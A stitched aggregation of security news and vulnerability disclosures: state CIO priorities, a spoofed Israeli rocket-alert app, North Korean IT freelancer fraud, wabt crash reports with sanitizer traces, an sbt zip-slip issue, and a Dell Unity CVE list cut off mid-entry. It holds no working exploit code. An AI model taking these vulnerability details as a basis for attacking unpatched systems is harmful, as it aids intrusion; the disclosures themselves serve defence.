The top 10 priorities of state CIOs underscore the importance of securing applications and APIs in complex environments.

The US National Association of State Chief Information Officers (NASCIO) released its set of State CIO Top Ten Policy and Technology Priorities for 2023 back in December 2022. I'd like to examine these priorities now as they relate to developing, delivering, and securing the applications and application programming interfaces (APIs) that help make state and local governments run — as well as how the complexity of hybrid and multicloud environments factors into the priorities.

**1\. Cybersecurity and Risk Management**

Over time, infrastructure has become significantly more complex and distributed. Most enterprises, including state and local governments, are managing hybrid and multicloud environments. By exposing more touch points, these more complex environments create an expanded threat landscape. State and local governments face intense pressure to continue improving their applications and APIs. However, this fast pace of innovation opens up the potential for vulnerabilities and security issues and necessitates protecting those applications and APIs. Thus, it is no surprise that cybersecurity and risk management are this year's top priority.

**2\. Digital Government/Digital Services**

Now more than ever, state and local governments are tasked with providing digital services to their citizens. Ensuring that services are provided to the appropriate and intended individuals is of the utmost importance. So is ensuring that digital services give citizens the best possible experience. This requires simplifying and optimizing how environments in which we deploy our applications and APIs are managed, as well as having those environments perform properly. Simplifying complexity improves security by removing the potential for human error, as does ensuring that APIs are served to the right citizens in a timely manner.

**3\. Workforce**

New environments require new skills. As state and local government infrastructures have evolved, so have the skills required to manage, operate, maintain, and secure them. This means training the workforce and equipping workers for today's challenges — including securing hybrid and multicloud environments and detecting, analyzing, and responding to security incidents wherever they occur, even in one or more cloud environments.

**4\. Legacy Modernization**

The migration of some applications and APIs to hybrid and multicloud environments has become an integral part of legacy modernization. As states and local governments go through these modernization efforts, their cloud strategies have been and will remain an important piece of the overall picture. Environments will need to be properly secured as they are modernized, regardless of where those environments reside.

**5\. Identity and Access Management**

Applications and APIs connect to (and potentially expose) back-end systems and data. In many cases, they are also the public face of the enterprise. As such, properly controlling access to applications and APIs is a significant challenge for any enterprise, including state and local governments. While identity and access management (IAM) is a broad topic, it has specific applicability to applications and APIs running in hybrid and multicloud environments.

**6\. Cloud Services**

As noted above in point 4, cloud strategy is an important piece of the overall picture within state and local governments. Citizens have grown to expect services to be delivered quickly and efficiently. They also expect significant innovation. This has necessitated that state and local governments move quickly and adapt. Such nimbleness is a key component of any cloud strategy, and an organization's cloud security efforts need to be equally nimble.

**7\. Consolidation/Optimization**

Simplifying and optimizing the management, operations, maintenance, and security of a variety of environments remains an important priority for two main reasons: In many enterprises, entire teams are dedicated to operating and maintaining infrastructure, development, security, and other technology stacks at each different environment. As the number of environments grows, this approach does not scale (it is an _n_\-squared problem, for those who enjoy algorithms).

In addition, as the saying goes: Complexity is the enemy of security. The complexity that hybrid and multicloud environments introduce makes it difficult to universally and consistently apply security policies. It also opens up the potential for human error and oversights that can lead to vulnerabilities. Simplifying this complexity by consolidating and centralizing the management of different environments becomes a necessity.

**8\. Data and Information Management**

Properly securing APIs, which expose back-end systems and data, is an essential piece of protecting data. API security includes a variety of important topics, including ensuring APIs conform to security policy and schema requirements.

While API security is a big focus area, so is API discovery. After all, if an API is not known, it can't be properly inventoried, managed, and secured. When thinking about data and information management, it is important to consider the security of APIs as an important part of that.

**9\. Broadband/Wireless Connectivity**

Part of providing services to citizens involves bringing state and local networks closer to the constituents. Efforts to improve broadband and wireless connectivity have many moving parts, and cloud and edge environments play a role in these efforts. Protecting those networks from unauthorized access is paramount to security.

**10\. Customer Relationship Management**

Citizens have come to expect that state and local governments will provide services within acceptable time frames. This requires serving applications and APIs quickly and efficiently. Service-level agreements (SLAs) will need to be met. A well-designed cloud security strategy is an essential part of achieving these goals and properly managing the relationship with citizens.

**In Short: Applications Are Key**

State and local government CIOs and their teams face no shortage of challenges. Generally, there are more issues needing attention than there are resources to do them. As such, simplifying the management, operations, maintenance, and security of complex environments becomes key.

In the era of hybrid and multicloud environments, state and local governments will generally see good returns on investments by more efficiently and effectively developing, delivering, and securing the applications and APIs that help make state and local governments run.

How State and Local Governments Can Serve Citizens More Securely

A spoofed version of an Israeli rocket-attack alerting app is targeting Android devices, in a campaign that shows how cyber-espionage attacks are shifting to individual, everyday citizens.

Using a trending item as a malicious lure is relatively common; to do it in a period of military conflict and deliberately target users in the affected region is a different step.

Recently, a genuine app — RedAlert - Rocket Alerts — has been popular among users in the Israel and Gaza region, since it allows individuals to receive timely and precise alerts about incoming airstrikes. However, a malicious, spoofed version of the app was detected last week, which collected personal information including access to contacts, call logs, SMS, account information, and an overview of other installed apps.

This and the discovery of a similar incident indicates that unfortunately, the Israel-Hamas conflict's cybercrimes will extend beyond nation-state attacks on critical infrastructure — and into the palm of the user's hand.

**The Initial Malicious App**

According to the discovery by Cloudflare, the website hosting the malicious file was created on Oct. 12, and it has been taken offline since. Only those users who installed the Android version of the app are impacted, and they are urgently advised to delete the app.

A statement from Cloudflare said it became aware of a website hosting a Google Android Application that impersonated the legitimate RedAlert - Rocket Alerts application. "Given the current climate in Israel, this application is heavily relied upon by individuals living in the country to be notified when it is critical to seek safety," it said.

The creation of a malicious app spoofing a known brand is common, according to a recent report from Arctic Wolf, which said malicious apps found in official app stores are often disguised with the use of names, images, or descriptions similar to popular or malware-free apps. They also may have fake reviews to help increase the malicious app's rating and to make them look more realistic.

But in this case, the malicious application mimicked a widely used app to steal data, in what Cloudflare called "a time of distress" where services such as this are replied upon, adding that this is "another example of threat attackers leveraging authenticity to carry out impactful attacks."

Casey Ellis, founder and CTO of Bugcrowd, says he does expect to see more cases like this where the Gaza conflict is used as a malware lure — both regionally and globally.

"Attackers are always on the lookout for events that create fear, uncertainty, and a volatile information environment, and the Israel-Hamas conflict definitely meets these criteria," he says.

Cloudflare was unable to add attribution to whoever was behind this malicious app, and there is no evidence that this was even a threat actor from the Middle East. So this could be the work of an unrelated cybercriminal looking to use the conflict for their malicious gain.

**More Than One Incident**

In a separate detection, Cloudflare said the pro-Palestinian hacktivist group AnonGhost exploited a vulnerability in another application, Red Alert: Israel. This allowed the group to intercept requests, expose servers and APIs, and send fake alerts to some app users, including a message that a nuclear bomb strike was imminent.

In its detection of that incident, Group-IB Threat Intelligence said this shows that the actions of attackers can be diverse, as hacktivists are generally associated with conducting small-scale DDoS attacks and defacement. But as the ongoing conflict shows, sometimes their actions can be far more devastating and costly, and "it's essential to map and properly mitigate the risk of hacktivism as part of a threat intelligence program."

Krishna Vishnubhotla, vice president of product strategy at Zimperium, says spoofing mobile apps is easy, as many app teams are inadvertently giving threat actors a blueprint for abuse.

He says, "App teams focus on code optimization and speed to market, but never ensure sufficient threat visibility and protection for their apps once they are published. Threat actors know this and use reverse engineering to truly understand an app's inner workings."

Vishnubhotla adds, "Knowing an application's architecture, data flow, and security mechanisms allows a hacker to easily create spoofed apps."

**Be Careful With Clicks**

The advice to avoid becoming victimized by these types of attacks is fairly straightforward. Arctic Wolf recommend checking the app's developers and reviews, restricting permissions when necessary; users should download apps only from reputable developers and look for mentions of scams or malicious activity mentioned in reviews by other users.

The advice from Group-IB was for organizations to carefully examine and fortify all Web-facing applications, as "it's not uncommon for hacktivists to exploit web and mobile APIs, often perceived as softer targets compared to the principal product APIs."

Ellis admits his advice on protection from malicious apps — saying users should trust, but verify — is nothing groundbreaking, but it persists for a reason.

"Double-check before you trust anything that offers to assist you in issues of personal safety, and triple-check before you share it with others," he says. He acknowledges that in this case, the malicious apps were downloaded by people in a state of concern and potentially without the due consideration they would usually give to vetting them.

Malicious Apps Spoof Israeli Attack Detectors: Conflict Goes Mobile

Organizations should be careful that the workers they hire on a freelance and temporary basis are not operatives working to funnel money to North Korea's WMD program, US DOJ says.

US organizations that hire freelance and temporary IT workers should be sure they are not signing up individuals working on behalf of the North Korean government.

In recent years, the Democratic People's Republic of Korea has flooded the freelance market with thousands of skilled IT workers who are quietly directing their earnings to the sanctions-ridden nation's nuclear weapons program. The workers primarily reside in Russia and China and use a medley of pseudonymous email and social media accounts, false websites, proxy computers, and other mechanisms to hide their true identities and locations when applying to work on a freelance basis for US and other firms worldwide.

**Seizure of Web Domains and Cash**

Last week, the US Department of Justice released details of the massive scam in announcing court-authorized seizures of 17 domains and some $1.7 million in revenues associated with the operation.

"The Democratic People's Republic of Korea has flooded the global marketplace with ill-intentioned information technology workers to indirectly fund its ballistic missile program," Special Agent in Charge Jay Greenberg of the FBI St. Louis Division said in a statement last week. "This scheme is so prevalent that companies must be vigilant to verify whom they're hiring."

The DOJ described the 17 domains it seized as being used by some North Korean IT workers to apply for remote work in the US and elsewhere. The websites appeared to be the domains of legitimate US-based IT services companies. In reality, however, the people behind it were North Korean IT workers with a China-based company called Yanbian Silverstar Network Technology Co. Ltd and another Russian company identified as Volasys Silver Star.

The North Korean IT workers at these companies used various online payment services and Chinese bank accounts to funnel earnings from their work as freelance IT workers back to North Korea. Each year, the workers have been generating millions of dollars for entities like North Korea's Ministry of Defense and other agencies tied to the country's WMD programs, the DoJ said.

**Previous Warning**

This is not the first time that the DoJ has warned US organizations of the scam. In a May 2022 advisory, the US government issued a similar warning about North Korean IT workers using VPNs, virtual private servers, purchased third-party IP addresses, proxy accounts, and stolen ID documents to pass themselves off as IT workers from other countries.

The advisory also provided specific guidance that hiring managers and other decision-makers could use when contracting for work with a freelancer. Some red flags: multiple logins into one account from various IP addresses in a short period; IP addresses associated with different countries; frequent money transfers through payment platforms, especially in China; and requests for payment in cryptocurrencies, the DoJ had noted.

The DoJ also urged US organizations to be on the lookout for other potential signs including inconsistencies in name spellings, claimed work location, contact information, and details about their education and work history across social media profiles, professional websites, and payment profiles. An inability by a freelancer to work during required business hours or any difficulty reaching the worker in a timely fashion are also factors to consider, the DoJ said.

**Camera Shy**

Last week's advisory provided updated advice for US organizations on how to spot a potential North Korean IT worker. Red flags include an unwillingness or inability by the freelance worker to come on camera or do video interviews and conferences, inconsistencies such as time of day and location, when they do appear on camera. Other giveaways include signs of cheating on coding tests or interviews — such as excessive pausing, stalling and eye scanning movements; repeated requests for prepayment and threats to release source code if payment is not made.

The advisory provided organizations with a list of things they can do to minimize risk including requesting documentation of background checks when using a third-party staffing firm; conducting due-diligence checks on individuals that a third-party firm might provide for freelance work; and not accepting background checks from unknown firms.

"These kinds of threats are incredibly challenging and costly to manage at a corporate level," said Andrew Barrett, vice president at Coalfire, in a statement. "Freelancers and contractors are an integral part of many businesses and entire companies have spun up, such as Fiverr, to help create a marketplace for them."

Detecting fake identities can be hugely challenging using typical background checks when dealing with state-sponsored fake identities, Barrett said.

Freelance Market Flooded With North Korean IT Actors

WebAssembly wabt 1.0.33 has an Out-of-Bound Memory Read in in DataSegment::IsValidRange(), which lead to segmentation fault.

**Environment**

OS               : Linux 5.10.16.3-microsoft-standard-WSL2 #1 SMP Fri Apr 2 22:23:49 UTC 2021 x86\_64 x86\_64 x86\_64 GNU/Linux
Commit           : 0e78c24fd231d5ee67ccd271bfa317faa963281c
Version          : 1.0.33 (git~1.0.33-35-gdddc03d3)
Clang Verison    : 12.0.1
Build            : mkdir build && cd build && export CC=clang CXX=clang++ CFLAGS="\-fsanitize=address -g" CXXFLAGS="\-fsanitize=address -g" && cmake .. && cmake --build .
Affected Tool    : wasm-interp
Enabled Features : None
Impact           : Out-of-Bound Memory Read Access

**Proof of Concept**

poc-wasm-interp-01.zip

**Stack Trace Provide By AddressSanitizer**

$  ~/wabt\_asan/bin/wasm-interp poc.wasm
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3549==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x00000064a0fe bp 0x7ffcceb61670 sp 0x7ffcceb61640 T0)
==3549==The signal is caused by a READ memory access.
==3549==Hint: address points to the zero page.
    #0 0x64a0fe in wabt::interp::DataSegment::IsValidRange(unsigned long, unsigned long) const /home/lain/wabt\_asan/src/interp/interp.cc:734:19
    #1 0x649cd7 in wabt::interp::Memory::Init(unsigned long, wabt::interp::DataSegment const&, unsigned long, unsigned long) /home/lain/wabt\_asan/src/interp/interp.cc:617:11
    #2 0x666cb4 in wabt::interp::Thread::DoMemoryInit(wabt::interp::Instr, wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:2075:3
    #3 0x65b199 in wabt::interp::Thread::StepInternal(wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:1510:32
    #4 0x65352b in wabt::interp::Thread::Run(int, wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:1086:19
    #5 0x645a70 in wabt::interp::Thread::Run(wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:1078:14
    #6 0x644caf in wabt::interp::DefinedFunc::DoCall(wabt::interp::Thread&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> > const&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> >&, wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:428:19
    #7 0x64417d in wabt::interp::Func::Call(wabt::interp::Store&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> > const&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> >&, wabt::interp::RefPtr<wabt::interp::Trap>\*, wabt::Stream\*) /home/lain/wabt\_asan/src/interp/interp.cc:394:10
    #8 0x6512e6 in wabt::interp::Instance::Instantiate(wabt::interp::Store&, wabt::interp::Ref, std::vector<wabt::interp::Ref, std::allocator<wabt::interp::Ref> > const&, wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:944:22
    #9 0x5693e5 in InstantiateModule(std::vector<wabt::interp::Ref, std::allocator<wabt::interp::Ref> >&, wabt::interp::RefPtr<wabt::interp::Module> const&, wabt::interp::RefPtr<wabt::interp::Instance>\*) /home/lain/wabt\_asan/src/tools/wasm-interp.cc:340:19
    #10 0x562e82 in ReadAndRunModule(char const\*) /home/lain/wabt\_asan/src/tools/wasm-interp.cc:423:3
    #11 0x561f67 in ProgramMain(int, char\*\*) /home/lain/wabt\_asan/src/tools/wasm-interp.cc:450:25
    #12 0x563191 in main /home/lain/wabt\_asan/src/tools/wasm-interp.cc:456:10
    #13 0x7f9f8fa00082 in \_\_libc\_start\_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
    #14 0x4845ed in \_start (/home/lain/wabt\_asan/bin/wasm-interp+0x4845ed)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/lain/wabt\_asan/src/interp/interp.cc:734:19 in wabt::interp::DataSegment::IsValidRange(unsigned long, unsigned long) const
==3549==ABORTING

CVE-2023-46331: Out-of-Bound Memory Read in DataSegment::IsValidRange() · Issue #2310 · WebAssembly/wabt

sbt is a build tool for Scala, Java, and others. Given a specially crafted zip or JAR file, `IO.unzip` allows writing of arbitrary file. This would have potential to overwrite `/root/.ssh/authorized_keys`. Within sbt's main code, `IO.unzip` is used in `pullRemoteCache` task and `Resolvers.remote`; however many projects use `IO.unzip(...)` directly to implement custom tasks. This vulnerability has been patched in version 1.9.7.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

xuwei-k opened this issue

Oct 15, 2023

· 1 comment · Fixed by #360

Closed

**zip slip vulnerability #358**

xuwei-k opened this issue

Oct 15, 2023

· 1 comment · Fixed by #360

**Comments**

*   https://security.snyk.io/research/zip-slip-vulnerability
*   https://github.com/snyk/zip-slip-vulnerability

How to fix? 🤔

*   change filter: NameFilter = AllPassFilter default param?
    *   def unzip(
        
        from: File,
        
        toDirectory: File,
        
        filter: NameFilter \= AllPassFilter,
        
        preserveLastModified: Boolean \= true
        
        ): Set\[File\] \=
        
        fileInputStream(from)(in \=> unzipStream(in, toDirectory, filter, preserveLastModified))
        
        def unzipURL(
        
        from: URL,
        
        toDirectory: File,
        
        filter: NameFilter \= AllPassFilter,
        
        preserveLastModified: Boolean \= true
        
        ): Set\[File\] \=
        
        urlInputStream(from)(in \=> unzipStream(in, toDirectory, filter, preserveLastModified))
        
        def unzipStream(
        
        from: InputStream,
        
        toDirectory: File,
        
        filter: NameFilter \= AllPassFilter,
        
*   add explicit filter param in user code?
    *   https://github.com/sbt/sbt/blob/da41144f37c32cbc0a64e3a91b505ce568869166/main/src/main/scala/sbt/Resolvers.scala#L44
    *   https://github.com/sbt/sbt/blob/da41144f37c32cbc0a64e3a91b505ce568869166/main/src/main/scala/sbt/internal/RemoteCache.scala#L416
*   another solutions?

eed3si9n added a commit to eed3si9n/io that referenced this issue

Oct 22, 2023

Fixes sbt#358
Ref codehaus-plexus/plexus-archiver 87

\*\*Problem\*\*
IO.unzip currently has zip-slip vulnerability, which can write arbitrary
files on the machine using specially crafted zip archive that holds path
traversal file names.

\*\*Solution\*\*
This replicates the fix originally sent to plex-archiver by Snyk Team.

eed3si9n added a commit to eed3si9n/io that referenced this issue

Oct 22, 2023

Fixes sbt#358
Ref codehaus-plexus/plexus-archiver 87

\*\*Problem\*\*
IO.unzip currently has zip-slip vulnerability, which can write arbitrary
files on the machine using specially crafted zip archive that holds path
traversal file names.

\*\*Solution\*\*
This replicates the fix originally sent to plex-archiver by Snyk Team.

2 participants

CVE-2023-46122: zip slip vulnerability · Issue #358 · sbt/io

WebAssembly wabt 1.0.33 contains an Out-of-Bound Memory Write in DataSegment::Drop(), which lead to segmentation fault.

**Environment**

OS               : Linux 5.10.16.3-microsoft-standard-WSL2 #1 SMP Fri Apr 2 22:23:49 UTC 2021 x86\_64 x86\_64 x86\_64 GNU/Linux
Commit           : 0e78c24fd231d5ee67ccd271bfa317faa963281c
Version          : 1.0.33 (git~1.0.33-35-gdddc03d3)
Clang Verison    : 12.0.1
Build            : mkdir build && cd build && export CC=clang CXX=clang++ CFLAGS="\-fsanitize=address -g" CXXFLAGS="\-fsanitize=address -g" && cmake .. && cmake --build .
Affected Tool    : wasm-interp
Enabled Features : None
Impact           : Out-of-Bound Memory Write Access

**Proof of Concept**

poc-wasm-interp-02.zip

**Stack Trace Provide By AddressSanitizer**

$  ~/wabt\_asan/bin/wasm-interp poc.wasm
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3641==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x00000067f426 bp 0x7ffd04e28310 sp 0x7ffd04e28300 T0)
==3641==The signal is caused by a WRITE memory access.
==3641==Hint: address points to the zero page.
    #0 0x67f426 in wabt::interp::DataSegment::Drop() /home/lain/wabt\_asan/include/wabt/interp/interp-inl.h:906:9
    #1 0x6670be in wabt::interp::Thread::DoDataDrop(wabt::interp::Instr) /home/lain/wabt\_asan/src/interp/interp.cc:2081:33
    #2 0x65b29a in wabt::interp::Thread::StepInternal(wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:1511:32
    #3 0x65352b in wabt::interp::Thread::Run(int, wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:1086:19
    #4 0x645a70 in wabt::interp::Thread::Run(wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:1078:14
    #5 0x644caf in wabt::interp::DefinedFunc::DoCall(wabt::interp::Thread&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> > const&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> >&, wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:428:19
    #6 0x64417d in wabt::interp::Func::Call(wabt::interp::Store&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> > const&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> >&, wabt::interp::RefPtr<wabt::interp::Trap>\*, wabt::Stream\*) /home/lain/wabt\_asan/src/interp/interp.cc:394:10
    #7 0x6512e6 in wabt::interp::Instance::Instantiate(wabt::interp::Store&, wabt::interp::Ref, std::vector<wabt::interp::Ref, std::allocator<wabt::interp::Ref> > const&, wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:944:22
    #8 0x5693e5 in InstantiateModule(std::vector<wabt::interp::Ref, std::allocator<wabt::interp::Ref> >&, wabt::interp::RefPtr<wabt::interp::Module> const&, wabt::interp::RefPtr<wabt::interp::Instance>\*) /home/lain/wabt\_asan/src/tools/wasm-interp.cc:340:19
    #9 0x562e82 in ReadAndRunModule(char const\*) /home/lain/wabt\_asan/src/tools/wasm-interp.cc:423:3
    #10 0x561f67 in ProgramMain(int, char\*\*) /home/lain/wabt\_asan/src/tools/wasm-interp.cc:450:25
    #11 0x563191 in main /home/lain/wabt\_asan/src/tools/wasm-interp.cc:456:10
    #12 0x7f77c7bdc082 in \_\_libc\_start\_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
    #13 0x4845ed in \_start (/home/lain/wabt\_asan/bin/wasm-interp+0x4845ed)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/lain/wabt\_asan/include/wabt/interp/interp-inl.h:906:9 in wabt::interp::DataSegment::Drop()
==3641==ABORTING

CVE-2023-46332: Out-of-Bound Memory Write in DataSegment::Drop() · Issue #2311 · WebAssembly/wabt


Dell Unity 5.3 contain(s) an Arbitrary File Creation vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability by crafting arbitrary files through a request to the server.



**Impact**

Critical

**Details**

Third-party Component

CVEs

More information

open-vm-tools

CVE-2022-31676

https://www.suse.com/security/cve/CVE-2022-31676.html

postgresql-jdbc

CVE-2022-41946

https://www.suse.com/security/cve/CVE-2022-41946.html

bind

CVE-2021-25220

https://www.suse.com/security/cve/CVE-2021-25220.html

libstdc

CVE-2020-13844, CVE-2019-15847, CVE-2019-14250

https://www.suse.com/security/cve/CVE-2020-13844.html, https://www.suse.com/security/cve/CVE-2019-15847.html, https://www.suse.com/security/cve/CVE-2019-14250.html

ntp

CVE-2020-15025, CVE-2020-13817, CVE-2018-8956, CVE-2020-11868

https://www.suse.com/security/cve/CVE-2020-15025.html, https://www.suse.com/security/cve/CVE-2020-13817.html, https://www.suse.com/security/cve/CVE-2018-8956.html, https://www.suse.com/security/cve/CVE-2020-11868.html

runc

CVE-2022-31030, CVE-2022-29162

https://www.suse.com/security/cve/CVE-2022-31030.html, https://www.suse.com/security/cve/CVE-2022-29162.html

sysstat

CVE-2019-16167, CVE-2018-19517, CVE-2018-19416

https://www.suse.com/security/cve/CVE-2019-16167.html, https://www.suse.com/security/cve/CVE-2018-19517.html, https://www.suse.com/security/cve/CVE-2018-19416.html

cpio

CVE-2021-38185

https://www.suse.com/security/cve/CVE-2021-38185.html

dnsmasq

CVE-2020-25687, CVE-2020-25686, CVE-2020-25682, CVE-2020-25681, CVE-2020-25685, CVE-2020-25684, CVE-2020-25683, CVE-2022-0934, CVE-2021-3448

https://www.suse.com/security/cve/CVE-2020-25687.html, https://www.suse.com/security/cve/CVE-2020-25686.html, https://www.suse.com/security/cve/CVE-2020-25682.html, https://www.suse.com/security/cve/CVE-2020-25681.html, https://www.suse.com/security/cve/CVE-2020-25685.html, https://www.suse.com/security/cve/CVE-2020-25684.html, https://www.suse.com/security/cve/CVE-2020-25683.html, https://www.suse.com/security/cve/CVE-2022-0934.html, https://www.suse.com/security/cve/CVE-2021-3448.html

git

CVE-2022-29187, CVE-2022-24765

https://www.suse.com/security/cve/CVE-2022-29187.html, https://www.suse.com/security/cve/CVE-2022-24765.html

krb5

CVE-2021-3672

https://www.suse.com/security/cve/CVE-2021-3672.html

Dbus

CVE-2020-35512, CVE-2020-12049

https://www.suse.com/security/cve/CVE-2020-35512.html, https://www.suse.com/security/cve/CVE-2020-12049.html

mozilla

CVE-2022-31741, CVE-2015-20107, CVE-2021-3572, CVE-2020-26116, CVE-2019-11324, CVE-2019-11236, CVE-2019-9740, CVE-2018-20060, CVE-2018-18074

https://www.suse.com/security/cve/CVE-2022-31741.html, https://www.suse.com/security/cve/CVE-2015-20107.html, https://www.suse.com/security/cve/CVE-2021-3572.html, https://www.suse.com/security/cve/CVE-2020-26116.html, https://www.suse.com/security/cve/CVE-2019-11324.html, https://www.suse.com/security/cve/CVE-2019-11236.html, https://www.suse.com/security/cve/CVE-2019-9740.html, https://www.suse.com/security/cve/CVE-2018-20060.html, https://www.suse.com/security/cve/CVE-2018-18074.html

root user

CVE-2019-5021

https://www.suse.com/security/cve/CVE-2019-5021.html

xstream

CVE-2021-21342

https://www.suse.com/security/cve/CVE-2021-21342.html

dom4j

CVE-2020-10683

https://www.suse.com/security/cve/CVE-2020-10683.html

vim

CVE-2021-3973

https://www.suse.com/security/cve/CVE-2021-3973.html

tomcat

CVE-2022-25762, CVE-2022-23181

https://www.suse.com/security/cve/CVE-2022-25762.html, https://www.suse.com/security/cve/CVE-2022-23181.html

apache2

CVE-2022-26373, CVE-2022-26377, CVE-2022-28614, CVE-2022-28615, CVE-2022-29404, CVE-2022-30522, CVE-2022-31813, CVE-2022-30556

https://www.suse.com/security/cve/CVE-2022-26373.html, https://www.suse.com/security/cve/CVE-2022-26377.html, https://www.suse.com/security/cve/CVE-2022-28614.html, https://www.suse.com/security/cve/CVE-2022-28615.html, https://www.suse.com/security/cve/CVE-2022-29404.html, https://www.suse.com/security/cve/CVE-2022-30522.html, https://www.suse.com/security/cve/CVE-2022-31813.html, https://www.suse.com/security/cve/CVE-2022-30556.html

libopenssl-1\_1

CVE-2022-1292

https://www.suse.com/security/cve/CVE-2022-1292.html

avahi

CVE-2021-26720, CVE-2021-3468

https://www.suse.com/security/cve/CVE-2021-26720.html   , https://www.suse.com/security/cve/CVE-2021-3468.html

Libgcrypt

CVE-2021-33560

https://www.suse.com/security/cve/CVE-2021-33560.html

Libnettle

CVE-2021-3580

https://www.suse.com/security/cve/CVE-2021-3580.html

pcre2

CVE-2022-1587, CVE-2019-20454

https://www.suse.com/security/cve/CVE-2022-1587.html, https://www.suse.com/security/cve/CVE-2019-20454.html

Cyrus

CVE-2022-24407

https://www.suse.com/security/cve/CVE-2022-24407.html

libopenssl-1\_1

CVE-2022-2097, CVE-2022-2068

https://www.suse.com/security/cve/CVE-2022-2097.html, https://www.suse.com/security/cve/CVE-2022-2068.html

apache-commons-httpclient

CVE-2020-13956

https://www.suse.com/security/cve/CVE-2020-13956.html

openssh

CVE-2021-41617

https://www.suse.com/security/cve/CVE-2021-41617.html

e2fsprogs

CVE-2022-1304

https://www.suse.com/security/cve/CVE-2022-1304.html

containerd, docker

CVE-2021-43565, CVE-2022-27191, CVE-2022-24769, CVE-2022-23648

https://www.suse.com/security/cve/CVE-2021-43565.html, https://www.suse.com/security/cve/CVE-2022-27191.html, https://www.suse.com/security/cve/CVE-2022-24769.html, https://www.suse.com/security/cve/CVE-2022-23648.html

ucode-intel

CVE-2022-21151  

https://www.suse.com/security/cve/CVE-2022-21151.html

openjdk

CVE-2022-21476, CVE-2022-21426, CVE-2022-21496, CVE-2022-21496, CVE-2022-21434, CVE-2022-21443

https://www.suse.com/security/cve/CVE-2022-21476.html, https://www.suse.com/security/cve/CVE-2022-21426.html, https://www.suse.com/security/cve/CVE-2022-21496.html, https://www.suse.com/security/cve/CVE-2022-21496.html, https://www.suse.com/security/cve/CVE-2022-21434.html, https://www.suse.com/security/cve/CVE-2022-21443.html

tiff

CVE-2022-0909, CVE-2022-0908, CVE-2022-0562, CVE-2022-0561, CVE-2022-0891, CVE-2022-0865, CVE-2022-1056, CVE-2022-0924

https://www.suse.com/security/cve/CVE-2022-0909.html, https://www.suse.com/security/cve/CVE-2022-0908.html, https://www.suse.com/security/cve/CVE-2022-0562.html, https://www.suse.com/security/cve/CVE-2022-0561.html, https://www.suse.com/security/cve/CVE-2022-0891.html, https://www.suse.com/security/cve/CVE-2022-0865.html, https://www.suse.com/security/cve/CVE-2022-1056.html, https://www.suse.com/security/cve/CVE-2022-0924.html

gzip, xz

CVE-2022-1271

https://www.suse.com/security/cve/CVE-2022-1271.html

mozilla-nss

CVE-2022-1097

https://www.suse.com/security/cve/CVE-2022-1097.html

util-linux

CVE-2021-37600

https://www.suse.com/security/cve/CVE-2021-37600.html

OpenSSL

CVE-2022-0778

https://www.suse.com/security/cve/CVE-2022-0778.html

fbindglibc

CVE-2021-3999, CVE-2022-23218, CVE-2022-23219, CVE-2015-8985

https://www.suse.com/security/cve/CVE-2021-3999.html, https://www.suse.com/security/cve/CVE-2022-23218.html, https://www.suse.com/security/cve/CVE-2022-23219.html, https://www.suse.com/security/cve/CVE-2015-8985.html

libxml2

CVE-2022-23308

https://www.suse.com/security/cve/CVE-2022-23308.html

binutils

CVE-2020-16591, CVE-2020-16599, CVE-2020-16598, CVE-2020-16592, CVE-2020-16593, CVE-2020-16590, CVE-2020-35448, CVE-2020-35496, CVE-2020-35493, CVE-2020-35507, CVE-2021-20197, CVE-2021-20284, CVE-2021-3487, CVE-2021-20294

https://www.suse.com/security/cve/CVE-2020-16591.html, https://www.suse.com/security/cve/CVE-2020-16599.html, https://www.suse.com/security/cve/CVE-2020-16598.html, https://www.suse.com/security/cve/CVE-2020-16592.html, https://www.suse.com/security/cve/CVE-2020-16593.html, https://www.suse.com/security/cve/CVE-2020-16590.html, https://www.suse.com/security/cve/CVE-2020-35448.html, https://www.suse.com/security/cve/CVE-2020-35496.html, https://www.suse.com/security/cve/CVE-2020-35493.html, https://www.suse.com/security/cve/CVE-2020-35507.html, https://www.suse.com/security/cve/CVE-2021-20197.html, https://www.suse.com/security/cve/CVE-2021-20284.html, https://www.suse.com/security/cve/CVE-2021-3487.html, https://www.suse.com/security/cve/CVE-2021-20294.html

pcre

CVE-2020-14155, CVE-2019-20838

https://www.suse.com/security/cve/CVE-2020-14155.html, https://www.suse.com/security/cve/CVE-2019-20838.html

kernel

